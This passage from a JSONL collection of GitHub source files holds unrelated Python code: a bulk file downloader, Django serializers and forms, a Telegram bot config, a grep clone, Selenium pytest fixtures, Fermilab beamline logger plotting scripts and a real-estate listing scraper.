# Her satırı oku\r\n for line in f:\r\n # Satır başı/sonu boşluklarını sil\r\n url = line.strip()\r\n # Dosya adını URL'den al\r\n filename = os.path.basename(url)\r\n # Dosyayı indir\r\n download_file(url, filename)\r\n print(f\"{url} adresinden dosya indirildi\")\r\n counter += 1\r\n # Sayacın 10'a ulaşıp ulaşmadığını kontrol et\r\n if counter % 10 == 0:\r\n # IP değiştir\r\n change_ip()\r\n\r\n#def change_ip():\r\n # VPN veya proxy hizmetinden yeni bir IP iste\r\n #requests.get(\"http://your-vpn-or-proxy-service.com/change_ip\")\r\n #print(\"IP adresi değiştirildi\")\r\n\r\n# Fonksiyonu örnek bir kelime listesiyle test et\r\nwordlist_path = \"links.txt\"\r\ndownload_from_wordlist(wordlist_path)","repo_name":"guneyimben/docs_dumper","sub_path":"docs_dumper.py","file_name":"docs_dumper.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72562822953","text":"from rest_framework import serializers\nfrom books.models import Book, Reader\n\n\nclass BookSerializer(serializers.Serializer):\n id = serializers.IntegerField(required=False)\n title = serializers.CharField(max_length=100, required=True)\n author = serializers.CharField(max_length=100, required=True)\n description = serializers.CharField(required=False)\n reader = serializers.CharField(required=False)\n\n def create(self, validated_data):\n return Book.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.author = validated_data.get('author', instance.author)\n instance.description = validated_data.get(\n 'description', instance.description,\n )\n new_reader = validated_data.get('reader', 'none')\n if new_reader == 'none':\n instance.reader = None\n elif new_reader:\n new_reader_id = int(new_reader)\n new_reader = Reader.objects.get(id=new_reader_id)\n instance.reader = new_reader\n instance.save()\n return instance\n\n\nclass ReaderSerializer(serializers.Serializer):\n id = serializers.IntegerField(required=False)\n first_name = serializers.CharField(max_length=100)\n last_name = serializers.CharField(max_length=100)\n list_of_books = serializers.ListField(required=False)\n\n def create(self, validated_data):\n return Reader.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.first_name = validated_data.get(\n 'first_name', instance.first_name,\n )\n instance.last_name = validated_data.get(\n 'last_name', instance.last_name,\n )\n instance.save()\n return instance\n","repo_name":"Ferril/library-project","sub_path":"library/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37211874894","text":"from django import forms\nfrom .models import Catastro\nfrom apps.gdocumental.models import GDocumental\n\nclass CatastroForm(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n descripcion_catastral = forms.CharField(max_length=50)\n referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=Catastro\n exclude = ['usuario_modifica','fecha_modificacion','usuario_crea','fecha_creacion', 'pk_gestion_documental']\n widget={'descripcion castastral': forms.TextInput()}\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass CatastroPDFForm(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n #descripcion_catastral = forms.CharField(max_length=50)\n #referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=Catastro \n exclude = ['usuario_modifica','fecha_modificacion','usuario_crea','fecha_creacion']\n widget={'descripcion castastral': forms.TextInput()}\n fields = ['pk_gestion_documental']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass GDFormPDF(forms.ModelForm):\n #pk_empresa = forms\n #pk_gestion_documental=forms\n \n #form.pk_gestion_documental.queryset=pk_gestion_documental.objects.filter(pk_gestion_documental=1) \n #self.fields['category'].queryset = models.GDocumental.objects.filter(user=user)\n #form.rate.queryset = Rate.objects.filter(company_id=the_company.id)\n #pk_gestion_documental = forms.pk_gestion_documental(queryset=pk_gestion_documental.objects.all())\n\n gd = forms.ModelChoiceField(\n queryset = Catastro.objects.filter(pk_gestion_documental=1)\n )\n\n descripcion = forms.CharField(max_length=50)\n #referencia_catastral = forms.CharField(max_length=50) \n class Meta:\n model=GDocumental\n exclude = ['um','fm','uc','fc']\n widget={'ficheros': forms.TextInput()}\n fields = ['gd', 'descripcion', 'fichero_pdf']\n #fields = ['descripcion']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n","repo_name":"JavierGonzalezAlvarez/django_admin_angular","sub_path":"back/apps/catastro/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21293124620","text":"import os\n\nAPI_TOKEN = os.environ.get(\"TG_API_TOKEN\")\nNOTIFY_TIME = 0\nVERSION_BUILD = \"3.2.1_13062023\"\n\nrelax_timer = 5\nrelax_mailer = 0.2\nrelax_retry_error = 10\nrelax_checker = 0.2\n\nadmin_ids = list(os.environ.get(\"ADMIN_CHAT_IDS\").split(\",\"))\ndb_url = os.environ.get(\"DATABASE_URL\")\n\ndb_table_users = \"users\"\ndb_table_login = \"login\"\ndb_table_regions = \"regions\"\ndb_table_examsinfo = \"exams_info\"\ndb_table_stats = \"stats\"\n\nEGE_URL = \"https://checkege.rustest.ru/api/exam\"\nEGE_TOKEN_URL = \"https://checkege.rustest.ru/api/captcha\"\nEGE_LOGIN_URL = \"https://checkege.rustest.ru/api/participant/login\"\n\nEGE_HEADERS = {\n 'Accept': '*/*',\n 'Accept-Language': 'ru,ru-RU;q=0.9,en;q=0.8,sr;q=0.7',\n 'Connection': 'keep-alive',\n 'Cookie': '',\n 'DNT': '1',\n 'Referer': 'https://checkege.rustest.ru/exams',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/111.0.5563.116 YaBrowser/22.8.0.223 (lite) Mobile Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n}\n\nproxy_url = os.environ.get(\"PROXY_URL\")\nenvironment_id = os.environ.get(\"ENVIRONMENT_UID\")\n","repo_name":"amanokh/EgeCheckBot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38750280514","text":"#! /usr/bin/env python3\n\"\"\"Python style grep\"\"\"\n\nimport sys\nimport re\nimport fileinput\n\n\ndef grep_py(args):\n \"\"\"Searches for pattern in files given on commandline\n and prints matches to standard out.\n\n Args:\n args: commandline arguments.\n \"\"\"\n\n try:\n search_string = args[1]\n with fileinput.input(args[2:]) as infile:\n matches = [(infile.filename(), infile.filelineno(), line)\n for line in infile\n if re.search(search_string, line, re.IGNORECASE)]\n\n if len(args[2:]) > 1:\n for file_name, line_number, line in matches:\n print('{file_name}: ({number}): {match}'.format(\n file_name=file_name,\n number=line_number,\n match=line),\n end='')\n else:\n print(*matches, sep='')\n except FileNotFoundError:\n print('{program_name}: {file_name}: No such file or directory'.format(\n program_name=args[0],\n file_name=args[2]\n ))\n sys.exit(-2)\n except KeyboardInterrupt:\n sys.exit(-3)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n sys.exit(grep_py(sys.argv))\n else:\n sys.exit(-1)\n","repo_name":"subs-comps-git/toolbox","sub_path":"system/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41533236064","text":"import requests\nimport json\nimport datetime\nimport time\n\nurl = 'http://localhost:4101/api/v1/analytics/logs' # Replace with the actual URL of the form submission endpoint\nwhile True:\n form_data = {\n 'timestamp': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'), \n 'CameraName': 'johndoe@example.com',\n 'location': 'This is a test message',\n 'CustomerName':'abc',\n 'Lat': 22.01,\n 'Long': 22.01,\n 'Speed' : 40,\n \"VehicleType\": \"\",\n \"Vehicle_Color\": \"\",\n \"isSpeeding\": \"false\",\n \"isANPR\": \"false\",\n \"isWrongWay\":\"false\" ,\n \"isNoHelmet\": \"false\",\n \"isRLVD\": \"false\",\n \"isTripleRiding\": \"false\",\n \"VehicleMake\": \"\",\n \"vehicle_lpr_number\": \"\" ,\n \"vehicle_model\": \"\",\n \"LPNumber\": \"\",\n \n\n }\n files = {} \n files = {\n # 'IMAGEURL': open('./test.webp', 'rb'),\n 'SnapshotURL': open('./test.webp', 'rb'),\n # 'LPImageURL': open('/path/to/file.pdf', 'rb'),\n # 'RLVDImageURL': open('/path/to/file.pdf', 'rb'),\n # 'VideoURL': open('/path/to/file.pdf', 'rb'),\n }\n\n\n response = requests.post(url, data=json.loads(json.dumps(form_data)), files=files)\n \n print(response.status_code)\n # Check the response status code\n if response.status_code == requests.codes.created:\n print('Form submitted successfully!')\n else:\n print('Failed to submit the form.')\n time.sleep(0.30)","repo_name":"deepikaverma2906/deepika","sub_path":"Client-api/sendlogs.py","file_name":"sendlogs.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1777120817","text":"import threading\n\n\nclass MetaBorg(type):\n _state = {\"__skip_init__\": False}\n _borg_lock = threading.Lock()\n\n def __call__(cls, *args, **kwargs):\n if cls._state['__skip_init__']:\n cls.__check_args(*args, **kwargs)\n with cls._borg_lock:\n instance = object().__new__(cls, *args, **kwargs)\n instance.__dict__ = cls._state\n if not cls._state['__skip_init__']:\n instance.__init__(*args, **kwargs)\n cls._state['__skip_init__'] = True\n return instance\n\n def __check_args(cls, *args, **kwargs):\n nargs = len(args)\n if nargs > 0:\n raise TypeError(\n '{}() takes 0 positional arguments after first initialization but {} was given'.format(\n cls.__name__, nargs\n )\n )\n nkeys = len(kwargs)\n if nkeys > 0:\n raise TypeError(\n \"{}() got an unexpected keyword argument '{}' after first initialization\".format(\n cls.__name__, list(kwargs.keys())[0]\n )\n )\n","repo_name":"uniba-ktr/KaaS","sub_path":"kathara-rest/src/control/borg.py","file_name":"borg.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"29782334307","text":"from django.conf.urls import url\r\n\r\nfrom tools.views import screen_width, tiny_mce, canvas01, dragNdrop\r\n\r\nurlpatterns = [\r\n url(r'^$', screen_width),\r\n url(r'^tinymce/$', tiny_mce),\r\n url(r'^canvas01/$', canvas01),\r\n url(r'^dndrop/$', dragNdrop),\r\n]\r\n","repo_name":"nybble33/code_sample","sub_path":"tools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21090642849","text":"import allure\nimport pytest\nimport time\n\nfrom allure_commons.types import AttachmentType\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom Utilities import configReader\n\n\n@pytest.hookimpl(hookwrapper=True, tryfirst=True)\ndef pytest_runtest_makereport(item, call):\n outcome = yield\n rep = outcome.get_result()\n setattr(item, \"rep_\" + rep.when, rep)\n return rep\n\n\n@pytest.fixture(scope=\"function\")\ndef chrome_browser():\n global driver\n driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver.get(\"https://www.facebook.com/\")\n driver.maximize_window()\n yield driver\n driver.quit()\n\n\n@pytest.fixture(params=[\"chrome\", \"firefox\"], scope=\"function\")\ndef get_browser(request):\n # global driver\n remote_url = \"http://localhost:4444/wd/hub\"\n if request.param == \"chrome\":\n # driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"chrome\"})\n if request.param == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"firefox\"})\n\n driver.get(\"https://www.facebook.com/\")\n driver.maximize_window()\n yield driver\n driver.quit()\n\n@pytest.fixture()\ndef log_on_failure(request, get_browser1):\n yield\n item = request.node\n if item.rep_call.failed:\n allure.attach(driver.get_screenshot_as_png(), name=\"dologin\", attachment_type=AttachmentType.PNG)\n\n\n@pytest.fixture(params=[\"chrome\", \"firefox\"], scope=\"function\")\ndef get_browser1(request):\n # global driver\n remote_url = \"http://localhost:4444/wd/hub\"\n if request.param == \"chrome\":\n # driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"chrome\"})\n if request.param == \"firefox\":\n # driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver = webdriver.Remote(command_executor=remote_url, desired_capabilities={\"browserName\": \"firefox\"})\n request.cls.driver = driver\n driver.get(configReader.readConfig(\"basic info\", \"testsiteurl\"))\n driver.maximize_window()\n driver.implicitly_wait(10)\n yield driver\n driver.quit()\n","repo_name":"goudasantosh005/SeleniumPythonPageObjectModel","sub_path":"Testcases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74346062311","text":"from logger_get import *\nimport numpy as np\n\n\nnhours=72\nT2 = int(time.time())\nT1 = int(T2 - nhours*3600)\n\nbnb_rate = {\n \"desc\": \"BNB rate\",\n \"devicename\": \"E:MBRATE\",\n \"units\": \"protons/hour\",\n \"event\": \"e,00,e,2000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 1.0E17\n}\nbnb_tor = {\n \"desc\": \"BNB intensity\",\n \"devicename\": \"E:TR875L\",\n \"units\": \"protons/pulse\",\n \"event\": \"e,1d,e,40\",\n \"color\": gold,\n \"yMin\": 0.0,\n \"yMax\": 5\n}\ntry:\n\tt, d = acsysLoggerGet(bnb_rate[\"devicename\"], bnb_rate[\"event\"], T1, T2)\n\tbnb_rate[\"t_data\"] = t\n\tbnb_rate[\"data\"] = d\n\tt, d = acsysLoggerGet(bnb_tor[\"devicename\"], bnb_tor[\"event\"], T1, T2)\n\tbnb_tor[\"t_data\"] = t\n\tbnb_tor[\"data\"] = d\n\ttimePlot('bnb_overview', [bnb_rate, bnb_tor], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\t\nbooster_turns = {\n \"desc\": \"Booster $1D turns\",\n \"devicename\": \"G:TURN1D\",\n \"units\": \"turns\",\n \"event\": \"p,30000\",\n \"color\": grey,\n \"yMin\": 0.0,\n \"yMax\": 20.0,\n}\nbnb_rep = {\n \"desc\": \"Booster avg. rep. rate\",\n \"devicename\": \"E:MBPRTE\",\n \"units\": \"Hz\",\n \"event\": \"p,60000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntry:\n\tt, d = acsysLoggerGet(booster_turns[\"devicename\"], booster_turns[\"event\"], T1, T2)\n\tbooster_turns[\"t_data\"] = t\n\tbooster_turns[\"data\"] = d\n\tt, d = acsysLoggerGet(bnb_rep[\"devicename\"], bnb_rep[\"event\"], T1, T2)\n\tbnb_rep[\"t_data\"] = t\n\tbnb_rep[\"data\"] = d\n\ttimePlot('BNB_rates', [booster_turns, bnb_rep], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nlinac_tor = {\n \"desc\": \"Linac intensity\",\n \"devicename\": \"L:D7TOR\",\n \"units\": \"mA\",\n \"event\": \"p,15000\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 35.0,\n}\nbooster_loss = {\n \"desc\": \"Booster avg. loss\",\n \"devicename\": \"B:BPL5MA\",\n \"units\": \"Watts\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 700.0,\n}\ntry:\n\tt, d = acsysLoggerGet(linac_tor[\"devicename\"], linac_tor[\"event\"], T1, T2)\n\tlinac_tor[\"t_data\"] = t\n\tlinac_tor[\"data\"] = d\n\tt, d = acsysLoggerGet(booster_loss[\"devicename\"], booster_loss[\"event\"], T1, T2)\n\tbooster_loss[\"t_data\"] = t\n\tbooster_loss[\"data\"] = d\n\ttimePlot('BNB_upstream1', [linac_tor, booster_loss], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\t\nbooster_rate = {\n \"desc\": \"Booster rate\",\n \"devicename\": \"E:BTRATE\",\n \"units\": \"Hz\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 18.0,\n}\nbooster_eff = {\n \"desc\": \"Booster $1D efficiency\",\n \"devicename\": \"B:BEFF1D\",\n \"units\": \"%\",\n \"event\": \"p,15000\",\n \"color\": blue,\n \"yMin\": 60.0,\n \"yMax\": 100.0,\n}\ntry:\n\tt, d = acsysLoggerGet(booster_rate[\"devicename\"], booster_rate[\"event\"], T1, T2)\n\tbooster_rate[\"t_data\"] = t\n\tbooster_rate[\"data\"] = d\n\tt, d = acsysLoggerGet(booster_eff[\"devicename\"], booster_eff[\"event\"], T1, T2)\n\tbooster_eff[\"t_data\"] = t\n\tbooster_eff[\"data\"] = d\n\ttimePlot('BNB_upstream2', [booster_rate, booster_eff], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nTLI864 = {\n \"desc\": \"Loss @ 864\",\n \"devicename\": \"E:TLI864\",\n \"units\": \"R/s\",\n \"event\": \"e,1D,e,50\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 12.0,\n}\nTLI873 = {\n \"desc\": \"Loss @ 873\",\n \"devicename\": \"E:TLI873\",\n \"units\": \"R/s\",\n \"event\": \"e,1D,e,50\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 12.0,\n}\ntry:\n\tt, d = acsysLoggerGet(TLI864[\"devicename\"], TLI864[\"event\"], T1, T2)\n\tTLI864[\"t_data\"] = t\n\tTLI864[\"data\"] = d\n\tt, d = acsysLoggerGet(TLI873[\"devicename\"], TLI873[\"event\"], T1, T2)\n\tTLI873[\"t_data\"] = t\n\tTLI873[\"data\"] = d\n\ttimePlot('BNB_TLI', [TLI864, TLI873], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\nhorn_current = {\n \"desc\": \"BNB horn current\",\n \"devicename\": \"E:LHCURR\",\n \"units\": \"KA\",\n \"event\": \"p,3000\",\n \"color\": red,\n \"yMin\": 172.0,\n \"yMax\": 182.0,\n}\ntry:\n\tt, d = acsysLoggerGet(horn_current[\"devicename\"], horn_current[\"event\"], T1, T2)\n\thorn_current[\"t_data\"] = t\n\thorn_current[\"data\"] = d\n\ttimePlot('BNB_horn', [horn_current], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_jtmp1 = {\n \"desc\": \"Target temp. @ joint\",\n \"devicename\": \"E:BTJT1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntgt_jtmp2 = {\n \"desc\": \"Target temp. > joint\",\n \"devicename\": \"E:BTJT2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_jtmp1[\"devicename\"], tgt_jtmp1[\"event\"], T1, T2)\n\ttgt_jtmp1[\"t_data\"] = t\n\ttgt_jtmp1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_jtmp2[\"devicename\"], tgt_jtmp2[\"event\"], T1, T2)\n\ttgt_jtmp2[\"t_data\"] = t\n\ttgt_jtmp2[\"data\"] = d\n\ttimePlot('BNB_tgtjtmps', [tgt_jtmp1, tgt_jtmp2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_btmp1 = {\n \"desc\": \"Target temp. @ bend\",\n \"devicename\": \"E:BTBT1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": grey,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntgt_btmp2 = {\n \"desc\": \"Target temp. > bend\",\n \"devicename\": \"E:BTBT2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": gold,\n \"yMin\": 10.0,\n \"yMax\": 110.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_btmp1[\"devicename\"], tgt_btmp1[\"event\"], T1, T2)\n\ttgt_btmp1[\"t_data\"] = t\n\ttgt_btmp1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_btmp2[\"devicename\"], tgt_btmp2[\"event\"], T1, T2)\n\ttgt_btmp2[\"t_data\"] = t\n\ttgt_btmp2[\"data\"] = d\n\ttimePlot('BNB_tgtbtmps', [tgt_btmp1, tgt_btmp2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_bth1t1 = {\n \"desc\": \"Target HEX 1 in temp.\",\n \"devicename\": \"E:BTH1T1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntgt_bth1t2 = {\n \"desc\": \"Target HEX 1 out temp.\",\n \"devicename\": \"E:BTH1T2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": orange,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_bth1t1[\"devicename\"], tgt_bth1t1[\"event\"], T1, T2)\n\ttgt_bth1t1[\"t_data\"] = t\n\ttgt_bth1t1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_btmp2[\"devicename\"], tgt_bth1t2[\"event\"], T1, T2)\n\ttgt_bth1t2[\"t_data\"] = t\n\ttgt_bth1t2[\"data\"] = d\n\ttimePlot('BNB_tgthtmps1', [tgt_bth1t1, tgt_bth1t2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_bth2t1 = {\n \"desc\": \"Target HEX 2 in temp.\",\n \"devicename\": \"E:BTH2T1\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntgt_bth2t2 = {\n \"desc\": \"Target HEX 2 out temp.\",\n \"devicename\": \"E:BTH2T2\",\n \"units\": \"DegC\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 120.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_bth2t1[\"devicename\"], tgt_bth2t1[\"event\"], T1, T2)\n\ttgt_bth2t1[\"t_data\"] = t\n\ttgt_bth2t1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_bth2t2[\"devicename\"], tgt_bth2t2[\"event\"], T1, T2)\n\ttgt_bth2t2[\"t_data\"] = t\n\ttgt_bth2t2[\"data\"] = d\n\ttimePlot('BNB_tgthtmps2', [tgt_bth2t1, tgt_bth2t2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_hexv1 = {\n \"desc\": \"Target HEX 1 air vel.\",\n \"devicename\": \"E:BTH1AV\",\n \"units\": \"ft./m\",\n \"event\": \"p,30000\",\n \"color\": blue,\n \"yMin\": 0.0,\n \"yMax\": 2000.0,\n}\ntgt_hexv2 = {\n \"desc\": \"Target HEX 2 air vel.\",\n \"devicename\": \"E:BTH2AV\",\n \"units\": \"ft./m\",\n \"event\": \"p,30000\",\n \"color\": green,\n \"yMin\": 0.0,\n \"yMax\": 2000.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_hexv1[\"devicename\"], tgt_hexv1[\"event\"], T1, T2)\n\ttgt_hexv1[\"t_data\"] = t\n\ttgt_hexv1[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_hexv2[\"devicename\"], tgt_hexv2[\"event\"], T1, T2)\n\ttgt_hexv2[\"t_data\"] = t\n\ttgt_hexv2[\"data\"] = d\n\ttimePlot('BNB_tgtairvel', [tgt_hexv1, tgt_hexv2], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n\ntgt_blp = {\n \"desc\": \"Target blower pressure\",\n \"devicename\": \"E:BTBLAP\",\n \"units\": \"PSIG\",\n \"event\": \"p,30000\",\n \"color\": red,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntgt_h1p = {\n \"desc\": \"Target HEX1 pressure\",\n \"devicename\": \"E:BTH1AP\",\n \"units\": \"PSIG\",\n \"event\": \"p,30000\",\n \"color\": black,\n \"yMin\": 0.0,\n \"yMax\": 10.0,\n}\ntry:\n\tt, d = acsysLoggerGet(tgt_blp[\"devicename\"], tgt_blp[\"event\"], T1, T2)\n\ttgt_blp[\"t_data\"] = t\n\ttgt_blp[\"data\"] = d\n\tt, d = acsysLoggerGet(tgt_hexv2[\"devicename\"], tgt_hexv2[\"event\"], T1, T2)\n\ttgt_h1p[\"t_data\"] = t\n\ttgt_h1p[\"data\"] = d\n\ttimePlot('BNB_tgtairp', [tgt_blp, tgt_h1p], T1, T2, dims=[12, 4])\nexcept:\n\tpass\n","repo_name":"awattsFNAL/acsys_example","sub_path":"bnb.py","file_name":"bnb.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28906179606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 9 19:17:48 2018\n\n@author: Sudipta\n\n\"\"\"\n\ndef get_data(location, post_code):\n \n from requests import get\n from bs4 import BeautifulSoup\n import pandas as pd\n from time import sleep\n from random import randint\n from collections import defaultdict\n \n data = defaultdict(list)\n headers = ({'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'})\n url = 'https://www.realestate.com.au/buy/property-house-in-{loc},+nsw+{code}/list-'.format(loc=location, code=post_code)\n \n n_pages = 0\n\n for page in range(0,40):\n n_pages += 1\n response = get(url+str(n_pages), headers= headers)\n html_soup = BeautifulSoup(response.text, 'html.parser')\n\n house_containers = html_soup.find_all('div', class_=\"residential-card__content\")\n if house_containers != []: \n for house in house_containers: \n try:\n data[\"price\"].append(house.find_all('span', class_='property-price')[0].text)\n except:\n data[\"price\"].append(None)\n try:\n weblink = house.find('a')\n href = 'https://www.realestate.com.au'+weblink.get('href')\n data['link'].append(href)\n except:\n data[\"link\"].append(None)\n \n try:\n data[\"location\"].append(house.find_all('span', class_='')[1].text)\n except:\n data[\"location\"].append(None)\n \n try:\n data[\"property_type\"].append(house.find_all('span', class_=\"residential-card__property-type\")[0].text)\n except:\n data[\"property_type\"].append(None)\n \n try:\n data[\"beds\"].append(house.find_all('span', class_=\"general-features__icon general-features__beds\")[0].text)\n except:\n data[\"beds\"].append(None)\n try:\n data[\"baths\"].append(house.find_all('span', class_=\"general-features__icon general-features__baths\")[0].text)\n except:\n data[\"baths\"].append(None)\n \n try:\n data[\"parking\"].append(house.find_all('span', class_=\"general-features__icon general-features__cars\")[0].text)\n except:\n data[\"parking\"].append(None)\n \n try:\n data[\"size_m2\"].append(house.find_all('span', class_=\"property-size__icon property-size__land\")[0].text) \n except:\n data[\"size_m2\"].append(None)\n else:\n break\n \n sleep(randint(1,2)) \n\n df = pd.DataFrame.from_dict(data)\n \n print('You scraped {} pages containing {} properties.'.format(n_pages, df.shape[0]))\n \n return df\n\ndef get_price(series):\n \n import re\n import numpy as np \n \n def clean_price(string):\n \n num = re.sub('[^\\d]','', string)\n \n return int(num.strip())\n \n try :\n if '$' in series:\n ## To to find to capture million dollar values and change the patteren\n match = re.findall(r'\\$(.*)',series)\n value = match[0] \n #Million dollors string check\n if '.' in value: \n val1 = re.search(r'(\\d[\\.]?\\d)', value)\n p = clean_price(val1.group())\n price = p*100000\n \n return price\n elif '-' in value: \n p1, p2 = value.split('-')\n price = round((clean_price(p1) + clean_price(p2))/2, 0)\n \n return price\n \n \n else:\n \n return clean_price(value)\n except: \n \n return np.nan\n \n\ndef clean_data(df):\n \n import pandas as pd\n df = df.fillna({'Price': 'missing','location': 'Unknown','beds': 0,\n 'bath': 0,'parking': 0, 'size_m2': '0'})\n df['beds'] = pd.to_numeric(df['beds'], errors='coerce')\n df['baths'] = pd.to_numeric(df['baths'], errors='coerce')\n df['parking'] = pd.to_numeric(df['parking'], errors='coerce')\n df['size_m2'] = df['size_m2'].str.strip().apply(lambda x : x if x.isdigit() else x.replace(',',''))\n df['size_m2'] = pd.to_numeric(df['size_m2'], errors = 'coerce')\n \n df['clean_price'] = df['price'].apply(get_price)\n return df\ndef get_lat_lon(location):\n \n import requests\n with open('../google_geocode_api.txt') as f:\n token = f.read().strip()\n \n if location.startswith('Address available on request'):\n location = location.replace('Address available on request,', '')\n \n try:\n location = location + ' NSW, Australia' \n url = f'https://maps.googleapis.com/maps/api/geocode/json?address={location}&key={token}'\n response = requests.get(url)\n if not response.status_code == 200:\n return (response.status_code, None)\n data = response.json()\n lat = data['results'][0]['geometry']['location']['lat']\n lng = data['results'][0]['geometry']['location']['lng']\n \n return (lat, lng)\n except:\n return (0.0, 0.0)\n## Geocoding address to lat 